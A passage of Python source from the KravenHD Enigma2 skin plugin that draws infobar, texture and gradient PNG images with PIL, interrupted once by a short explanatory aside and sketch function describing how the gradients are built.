config.plugins.KravenHD.InfobarTexture.value\n\t\t\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\t\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\t\t\telif fileExists(inpath + style + \".png\"):\n\t\t\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\t\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\t\t\tbg_w, bg_h = bg.size\n\t\t\t\tib = Image.new(\"RGBA\", (width, boxbarheight), (0, 0, 0, 0))\n\t\t\t\tfor i in range(0, width, bg_w):\n\t\t\t\t\tfor j in range(0, boxbarheight, bg_h):\n\t\t\t\t\t\tib.paste(bg, (i, j))\n\t\t\t\timg.paste(ib, (0, 0))\n\t\t\t\timg.paste(ib, (0, height-boxbarheight))\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tc1=config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\t\t\tc2=config.plugins.KravenHD.InfobarGradientColorSecondary.value\n\t\t\t\tc1=c1[-6:]\n\t\t\t\tr1=int(c1[0:2], 16)\n\t\t\t\tg1=int(c1[2:4], 16)\n\t\t\t\tb1=int(c1[4:6], 16)\n\t\t\t\tc2=c2[-6:]\n\t\t\t\tr2=int(c2[0:2], 16)\n\t\t\t\tg2=int(c2[2:4], 16)\n\t\t\t\tb2=int(c2[4:6], 16)\n\t\t\t\tif c1!=c2:\n\t\t\t\t\tib = Image.new(\"RGBA\", (1, boxbarheight))\n\t\t\t\t\tfor pos in range(0, boxbarheight):\n\t\t\t\t\t\tp=pos/float(boxbarheight)\n\t\t\t\t\t\tr=r2*p+r1*(1-p)\n\t\t\t\t\t\tg=g2*p+g1*(1-p)\n\t\t\t\t\t\tb=b2*p+b1*(1-p)\n\t\t\t\t\t\tib.putpixel((0, pos), (int(r), int(g), int(b), 255))\n\t\t\t\t\tib=ib.resize((width, boxbarheight))\n\t\t\t\t\timg.paste(ib, (0, height-boxbarheight))\n\t\t\t\t\tib=ib.transpose(Image.ROTATE_180)\n\t\t\t\t\timg.paste(ib, (0, 0))\n\t\t\t\telse:\n\t\t\t\t\tib = Image.new(\"RGBA\", (width, boxbarheight), (int(r1), int(g1), int(b1), 
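Every gradient in makePreview above is built the same way: the two endpoint colors are linearly interpolated down a 1-pixel-wide column, which PIL then stretches to the full width. A minimal sketch of that pattern (vertical_gradient and the sample colors are made up for illustration):

from PIL import Image

def vertical_gradient(width, height, rgb1, rgb2):
    # paint a 1xH column, blending rgb1 (top) into rgb2 (bottom)
    col = Image.new("RGBA", (1, height))
    for pos in range(height):
        p = pos / float(height)
        pixel = tuple(int(c2 * p + c1 * (1 - p)) for c1, c2 in zip(rgb1, rgb2))
        col.putpixel((0, pos), pixel + (255,))
    # resizing the 1-pixel column to the target width repeats it horizontally
    return col.resize((width, height))

preview = vertical_gradient(368, 207, (16, 16, 16), (64, 96, 160))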
255))\n\t\t\t\t\timg.paste(ib, (0, 0))\n\t\t\t\t\timg.paste(ib, (0, height-boxbarheight))\n\t\t\telse:\n\t\t\t\tc=self.skincolorinfobarcolor\n\t\t\t\tc=c[-6:]\n\t\t\t\tr=int(c[0:2], 16)\n\t\t\t\tg=int(c[2:4], 16)\n\t\t\t\tb=int(c[4:6], 16)\n\t\t\t\tib = Image.new(\"RGBA\", (width, boxbarheight), (int(r), int(g), int(b), 255))\n\t\t\t\timg.paste(ib, (0, 0))\n\t\t\t\timg.paste(ib, (0, height-boxbarheight))\n\t\t\tc=config.plugins.KravenHD.IBLine.value\n\t\t\tc=c[-6:]\n\t\t\tr=int(c[0:2], 16)\n\t\t\tg=int(c[2:4], 16)\n\t\t\tb=int(c[4:6], 16)\n\t\t\timg.paste((int(r), int(g), int(b), 255), (0, boxbarheight, width, boxbarheight+lineheight))\n\t\t\timg.paste((int(r), int(g), int(b), 255), (0, height-boxbarheight-lineheight, width, height-boxbarheight))\n\t\t\t\t\n\t\timg.save(\"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/preview.jpg\")\n\n\tdef makeIBGradTexturepng(self):\n\t\tself.makeIbarTextureGradientpng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value) # ibars\n\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 906, 170, \"shift\") # timeshift bar\n\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 400, 200, \"wsmall\") # weather small\n\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-small\":\n\t\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 400, 185, \"info\") # sysinfo small\n\t\telif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-big\":\n\t\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 400, 275, \"info\") # sysinfo big\n\t\telse:\n\t\t\tself.makeRectTexturepng(config.plugins.KravenHD.InfobarTexture.value, config.plugins.KravenHD.InfobarColorTrans.value, 400, 375, \"info\") # sysinfo bigsat\n\n\tdef makeIBGradColorpng(self):\n\t\tself.makeIbarColorGradientpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value) # ibars\n\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 906, 170, \"shift\") # timeshift bar\n\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 400, 200, \"wsmall\") # weather small\n\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-small\":\n\t\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 400, 185, \"info\") # sysinfo small\n\t\telif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-big\":\n\t\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 400, 275, \"info\") # sysinfo big\n\t\telse:\n\t\t\tself.makeRectColorpng(self.skincolorinfobarcolor, config.plugins.KravenHD.InfobarColorTrans.value, 400, 375, \"info\") # sysinfo bigsat\n\n\tdef makeIbarColorGradientpng(self, newcolor, newtrans):\n\t\twidth = int(1280 * self.factor) # width of the png file\n\t\tgradientspeed = 2.0 # look of the gradient. 
1 is flat (linear), higher means rounder\n\t\tibarheight = int(310 * self.factor) # height of ibar\n\t\tibargradientstart = int(50 * self.factor) # start of ibar gradient (from top)\n\t\tibargradientsize = int(100 * self.factor) # size of ibar gradient\n\t\tibaroheight = int(165 * self.factor) # height of ibaro\n\t\tibarogradientstart = int(65 * self.factor) # start of ibaro gradient (from top)\n\t\tibarogradientsize = int(100 * self.factor) # size of ibaro gradient\n\t\tibaro2height = int(110 * self.factor) # height of ibaro2\n\t\tibaro2gradientstart = int(20 * self.factor) # start of ibaro2 gradient (from top)\n\t\tibaro2gradientsize = int(90 * self.factor) # size of ibaro2 gradient\n\t\tibaro3height = int(145 * self.factor) # height of ibaro3\n\t\tibaro3gradientstart = int(45 * self.factor) # start of ibaro3 gradient (from top)\n\t\tibaro3gradientsize = int(100 * self.factor) # size of ibaro3 gradient\n\t\ttrans = (255-int(newtrans, 16))/255.0\n\n\t\tnewcolor = newcolor[-6:]\n\t\tr = int(newcolor[0:2], 16)\n\t\tg = int(newcolor[2:4], 16)\n\t\tb = int(newcolor[4:6], 16)\n\n\t\timg = Image.new(\"RGBA\", (width, ibarheight), (r, g, b, 0))\n\t\tgradient = Image.new(\"L\", (1, ibarheight), int(255*trans))\n\t\tfor pos in range(0, ibargradientstart):\n\t\t\tgradient.putpixel((0, pos), 0)\n\t\tfor pos in range(0, ibargradientsize):\n\t\t\tgradient.putpixel((0, ibargradientstart+pos), int(self.dexpGradient(ibargradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibar.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaroheight), (r, g, b, 0))\n\t\tgradient = Image.new(\"L\", (1, ibaroheight), 0)\n\t\tfor pos in range(0, ibarogradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibarogradientsize):\n\t\t\tgradient.putpixel((0, ibarogradientstart+ibarogradientsize-pos-1), int(self.dexpGradient(ibarogradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaro2height), (r, g, b, 0))\n\t\tgradient = Image.new(\"L\", (1, ibaro2height), 0)\n\t\tfor pos in range(0, ibaro2gradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibaro2gradientsize):\n\t\t\tgradient.putpixel((0, ibaro2gradientstart+ibaro2gradientsize-pos-1), int(self.dexpGradient(ibaro2gradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro2.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaro3height), (r, g, b, 0))\n\t\tgradient = Image.new(\"L\", (1, ibaro3height), 0)\n\t\tfor pos in range(0, ibaro3gradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibaro3gradientsize):\n\t\t\tgradient.putpixel((0, ibaro3gradientstart+ibaro3gradientsize-pos-1), int(self.dexpGradient(ibaro3gradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro3.png\")\n\n\tdef makeIbarTextureGradientpng(self, style, trans):\n\t\twidth = int(1280 * self.factor) # width of the png file\n\t\tgradientspeed = 2.0 # look of the gradient. 
1 is flat (linear), higher means rounder\n\t\tibarheight = int(310 * self.factor) # height of ibar\n\t\tibargradientstart = int(50 * self.factor) # start of ibar gradient (from top)\n\t\tibargradientsize = int(100 * self.factor) # size of ibar gradient\n\t\tibaroheight = int(165 * self.factor) # height of ibaro\n\t\tibarogradientstart = int(65 * self.factor) # start of ibaro gradient (from top)\n\t\tibarogradientsize = int(100 * self.factor) # size of ibaro gradient\n\t\tibaro2height = int(110 * self.factor) # height of ibaro2\n\t\tibaro2gradientstart = int(20 * self.factor) # start of ibaro2 gradient (from top)\n\t\tibaro2gradientsize = int(90 * self.factor) # size of ibaro2 gradient\n\t\tibaro3height = int(145 * self.factor) # height of ibaro3\n\t\tibaro3gradientstart = int(45 * self.factor) # start of ibaro3 gradient (from top)\n\t\tibaro3gradientsize = int(100 * self.factor) # size of ibaro3 gradient\n\t\ttrans = (255-int(trans, 16))/255.0\n\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(inpath + style + \".png\"):\n\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\n\t\timg = Image.new(\"RGBA\", (width, ibarheight), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, ibarheight, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\t\tgradient = Image.new(\"L\", (1, ibarheight), int(255*trans))\n\t\tfor pos in range(0, ibargradientstart):\n\t\t\tgradient.putpixel((0, pos), 0)\n\t\tfor pos in range(0, ibargradientsize):\n\t\t\tgradient.putpixel((0, ibargradientstart+pos), int(self.dexpGradient(ibargradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibar.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaroheight), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, ibaroheight, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\t\tgradient = Image.new(\"L\", (1, ibaroheight), 0)\n\t\tfor pos in range(0, ibarogradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibarogradientsize):\n\t\t\tgradient.putpixel((0, ibarogradientstart+ibarogradientsize-pos-1), int(self.dexpGradient(ibarogradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaro2height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, ibaroheight, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\t\tgradient = Image.new(\"L\", (1, ibaro2height), 0)\n\t\tfor pos in range(0, ibaro2gradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibaro2gradientsize):\n\t\t\tgradient.putpixel((0, ibaro2gradientstart+ibaro2gradientsize-pos-1), int(self.dexpGradient(ibaro2gradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro2.png\")\n\n\t\timg = Image.new(\"RGBA\", (width, ibaro3height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, ibaroheight, bg_h):\n\t\t\t\timg.paste(bg, (i, 
j))\n\t\tgradient = Image.new(\"L\", (1, ibaro3height), 0)\n\t\tfor pos in range(0, ibaro3gradientstart):\n\t\t\tgradient.putpixel((0, pos), int(255*trans))\n\t\tfor pos in range(0, ibaro3gradientsize):\n\t\t\tgradient.putpixel((0, ibaro3gradientstart+ibaro3gradientsize-pos-1), int(self.dexpGradient(ibaro3gradientsize, gradientspeed, pos)*trans))\n\t\talpha = gradient.resize(img.size)\n\t\timg.putalpha(alpha)\n\t\timg.save(self.graphics + \"ibaro3.png\")\n\n\tdef makeRectColorpng(self, newcolor, newtrans, width, height, pngname):\n\t\tgradientspeed = 2.0 # look of the gradient. 1 is flat (linear), higher means rounder\n\t\tgradientsize = int(80 * self.factor) # size of gradient\n\t\twidth = int(width * self.factor)\n\t\theight = int(height * self.factor)\n\t\ttrans = (255-int(newtrans, 16))/255.0\n\n\t\tnewcolor = newcolor[-6:]\n\t\tr = int(newcolor[0:2], 16)\n\t\tg = int(newcolor[2:4], 16)\n\t\tb = int(newcolor[4:6], 16)\n\n\t\timg = Image.new(\"RGBA\", (width, height), (r, g, b, int(255*trans)))\n\t\tgradient = Image.new(\"RGBA\", (1, gradientsize), (r, g, b, 0))\n\t\tfor pos in range(0, gradientsize):\n\t\t\tgradient.putpixel((0, pos), (r, g, b, int((self.dexpGradient(gradientsize, gradientspeed, pos))*trans)))\n\n\t\thgradient = gradient.resize((width-2*gradientsize, gradientsize))\n\t\timg.paste(hgradient, (gradientsize, 0, width-gradientsize, gradientsize))\n\t\thgradient = hgradient.transpose(Image.ROTATE_180)\n\t\timg.paste(hgradient, (gradientsize, height-gradientsize, width-gradientsize, height))\n\n\t\tvgradient = gradient.transpose(Image.ROTATE_90)\n\t\tvgradient = vgradient.resize((gradientsize, height-2*gradientsize))\n\t\timg.paste(vgradient, (0, gradientsize, gradientsize, height-gradientsize))\n\t\tvgradient = vgradient.transpose(Image.ROTATE_180)\n\t\timg.paste(vgradient, (width-gradientsize, gradientsize, width, height-gradientsize))\n\n\t\tcorner = Image.new(\"RGBA\", (gradientsize, gradientsize), (r, g, b, 0))\n\t\tfor xpos in range(0, gradientsize):\n\t\t\tfor ypos in range(0, gradientsize):\n\t\t\t\tdist = int(round((xpos**2+ypos**2)**0.503))\n\t\t\t\tcorner.putpixel((xpos, ypos), (r, g, b, int((self.dexpGradient(gradientsize, gradientspeed, gradientsize-dist-1))*trans)))\n\t\tcorner = corner.filter(ImageFilter.BLUR)\n\t\timg.paste(corner, (width-gradientsize, height-gradientsize, width, height))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\timg.paste(corner, (width-gradientsize, 0, width, gradientsize))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\timg.paste(corner, (0, 0, gradientsize, gradientsize))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\timg.paste(corner, (0, height-gradientsize, gradientsize, height))\n\t\timg.save(self.graphics + pngname + \".png\")\n\n\tdef makeRectTexturepng(self, style, trans, width, height, pngname):\n\t\tgradientspeed = 2.0 # look of the gradient. 
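makeRectColorpng above (and makeRectTexturepng after it) feather a rectangle by pasting an eased one-dimensional ramp along each edge and a radial version of the same ramp into each corner, keyed on the distance from the corner point. A standalone sketch of the corner falloff only, with a plain quadratic ease standing in for dexpGradient (corner_mask is a made-up name):

from PIL import Image

def corner_mask(size):
    # alpha fades radially: full near the inner corner, zero at radius `size`
    corner = Image.new("L", (size, size), 0)
    for x in range(size):
        for y in range(size):
            dist = (x * x + y * y) ** 0.5
            inner = max(0.0, 1.0 - dist / size)
            corner.putpixel((x, y), int(255 * inner * inner))  # quadratic ease-out
    return corner

mask = corner_mask(80)  # paste into an "L" mode alpha mask, as the methods above do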
1 is flat (linear), higher means rounder\n\t\tgradientsize = int(80 * self.factor) # size of gradient\n\t\twidth = int(width * self.factor)\n\t\theight = int(height * self.factor)\n\t\ttrans = (255 - int(trans, 16)) / 255.0\n\n\t\tinpath = \"/usr/share/enigma2/KravenHD/textures/\"\n\t\tusrpath = \"/usr/share/enigma2/Kraven-user-icons/\"\n\n\t\tif fileExists(usrpath + style + \".png\"):\n\t\t\tbg = Image.open(usrpath + style + \".png\")\n\t\telif fileExists(usrpath + style + \".jpg\"):\n\t\t\tbg = Image.open(usrpath + style + \".jpg\")\n\t\telif fileExists(inpath + style + \".png\"):\n\t\t\tbg = Image.open(inpath + style + \".png\")\n\t\telif fileExists(inpath + style + \".jpg\"):\n\t\t\tbg = Image.open(inpath + style + \".jpg\")\n\t\tbg_w, bg_h = bg.size\n\t\timg = Image.new(\"RGBA\", (width, height), (0, 0, 0, 0))\n\t\tfor i in range(0, width, bg_w):\n\t\t\tfor j in range(0, height, bg_h):\n\t\t\t\timg.paste(bg, (i, j))\n\n\t\tmask = Image.new(\"L\", (width, height), 255 * trans)\n\t\tgradient = Image.new(\"L\", (1, gradientsize), 0)\n\t\tfor pos in range(0, gradientsize):\n\t\t\tgradient.putpixel((0, pos), int((self.dexpGradient(gradientsize, gradientspeed, pos)) * trans))\n\n\t\thgradient = gradient.resize((width - 2 * gradientsize, gradientsize))\n\t\tmask.paste(hgradient, (gradientsize, 0, width - gradientsize, gradientsize))\n\t\thgradient = hgradient.transpose(Image.ROTATE_180)\n\t\tmask.paste(hgradient, (gradientsize, height - gradientsize, width - gradientsize, height))\n\n\t\tvgradient = gradient.transpose(Image.ROTATE_90)\n\t\tvgradient = vgradient.resize((gradientsize, height - 2 * gradientsize))\n\t\tmask.paste(vgradient, (0, gradientsize, gradientsize, height - gradientsize))\n\t\tvgradient = vgradient.transpose(Image.ROTATE_180)\n\t\tmask.paste(vgradient, (width - gradientsize, gradientsize, width, height - gradientsize))\n\n\t\tcorner = Image.new(\"L\", (gradientsize, gradientsize), 0)\n\t\tfor xpos in range(0, gradientsize):\n\t\t\tfor ypos in range(0, gradientsize):\n\t\t\t\tdist = int(round((xpos **2 + ypos **2) **0.503))\n\t\t\t\tcorner.putpixel((xpos, ypos), int((self.dexpGradient(gradientsize, gradientspeed, gradientsize - dist - 1)) * trans))\n\t\tcorner = corner.filter(ImageFilter.BLUR)\n\t\tmask.paste(corner, (width - gradientsize, height - gradientsize, width, height))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\tmask.paste(corner, (width - gradientsize, 0, width, gradientsize))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\tmask.paste(corner, (0, 0, gradientsize, gradientsize))\n\t\tcorner = corner.transpose(Image.ROTATE_90)\n\t\tmask.paste(corner, (0, height - gradientsize, gradientsize, height))\n\t\timg.putalpha(mask)\n\t\timg.save(self.graphics + pngname + \".png\")\n\n\tdef makeBGGradientpng(self):\n\t\tself.makeGradientpng(\"globalbg\", 1280, 720, config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value, config.plugins.KravenHD.BackgroundColorTrans.value)\n\t\tself.makeGradientpng(\"nontransbg\", 1280, 720, config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value, \"00\")\n\t\tself.makeGradientpng(\"channelbg\", 1280, 720, config.plugins.KravenHD.BackgroundGradientColorPrimary.value, config.plugins.KravenHD.BackgroundGradientColorSecondary.value, config.plugins.KravenHD.ChannelSelectionTrans.value)\n\n\tdef makeIBGradientpng(self):\n\t\twidth = 
1280\n\t\t#Ibar\n\t\tibarheights=[\n\t\t\t(\"infobar-style-nopicon\", 166),\n\t\t\t(\"infobar-style-x1\", 166),\n\t\t\t(\"infobar-style-zz1\", 198),\n\t\t\t(\"infobar-style-zz2\", 186),\n\t\t\t(\"infobar-style-zz3\", 186),\n\t\t\t(\"infobar-style-zzz1\", 248)\n\t\t\t]\n\t\tfor pair in ibarheights:\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value == pair[0]:\n\t\t\t\tself.makeGradientpng(\"ibar\", width, pair[1], config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\tif self.actClockstyle == \"clock-android\":\n\t\t\t\tself.makeGradientpng(\"ibar\", width, 154, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\t\telse:\n\t\t\t\tself.makeGradientpng(\"ibar\", width, 144, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tif self.actClockstyle == \"clock-android\":\n\t\t\t\tself.makeGradientpng(\"ibar\", width, 154, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\t\telse:\n\t\t\t\tself.makeGradientpng(\"ibar\", width, 140, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar2\", width, 64, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar3\", width, 70, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar4\", width, 80, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar5\", width, 110, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar6\", width, 206, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\tself.makeGradientpng(\"ibar7\", width, 285, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\t#Ibaro\n\t\tibaroheights=[\n\t\t\t(\"ibaro\", 59),\n\t\t\t(\"ibaro2\", 70),\n\t\t\t(\"ibaro3\", 116),\n\t\t\t(\"ibaro4\", 150)\n\t\t\t]\n\t\tfor pair in ibaroheights:\n\t\t\tself.makeGradientpng(pair[0], width, pair[1], config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#Sysinfo\n\t\tif 
config.plugins.KravenHD.InfoStyle.value == \"primary\":\n\t\t\tFirstColor=config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\t\tSecondColor=config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\telif config.plugins.KravenHD.InfoStyle.value == \"secondary\":\n\t\t\tFirstColor=config.plugins.KravenHD.InfobarGradientColorSecondary.value\n\t\t\tSecondColor=config.plugins.KravenHD.InfobarGradientColorSecondary.value\n\t\telse:\n\t\t\tFirstColor=config.plugins.KravenHD.InfobarGradientColorPrimary.value\n\t\t\tSecondColor=config.plugins.KravenHD.InfobarGradientColorSecondary.value\n\t\tif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-small\":\n\t\t\tself.makeGradientpng(\"info\", 300, 80, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\telif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-big\":\n\t\t\tself.makeGradientpng(\"info\", 300, 170, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\telif config.plugins.KravenHD.SystemInfo.value == \"systeminfo-bigsat\":\n\t\t\tself.makeGradientpng(\"info\", 300, 260, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#Timeshift\n\t\tself.makeGradientpng(\"shift\", 785, 62, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#InfobarTunerState\n\t\tself.makeGradientpng(\"ibts\", 1280, 32, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#AutoResolution\n\t\tself.makeGradientpng(\"autoresolution\", 252, 62, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#PVRState\n\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\tself.makeGradientpng(\"pvrstate\", 220, 90, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\t\telif config.plugins.KravenHD.PVRState.value in (\"pvrstate-center-small\", \"pvrstate-left-small\"):\n\t\t\tself.makeGradientpng(\"pvrstate\", 110, 45, FirstColor, SecondColor, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\t\t#Weather-small\n\t\tif self.actWeatherstyle == \"weather-small\":\n\t\t\tself.makeGradientpng(\"wsmall\", 300, 120, config.plugins.KravenHD.InfobarGradientColorSecondary.value, config.plugins.KravenHD.InfobarGradientColorPrimary.value, config.plugins.KravenHD.InfobarColorTrans.value)\n\n\tdef makeSELGradientpng(self):\n\t\tself.makeGradientpng(\"sel_30\", 1220, 30, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_36\", 1196, 36, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_40\", 870, 40, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_45\", 747, 45, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_50\", 765, 50, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_53\", 736, 54, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_60\", 747, 60, config.plugins.KravenHD.SelectionBackground.value, config.plugins.KravenHD.SelectionBackground2.value, \"00\")\n\t\tself.makeGradientpng(\"sel_70\", 765, 
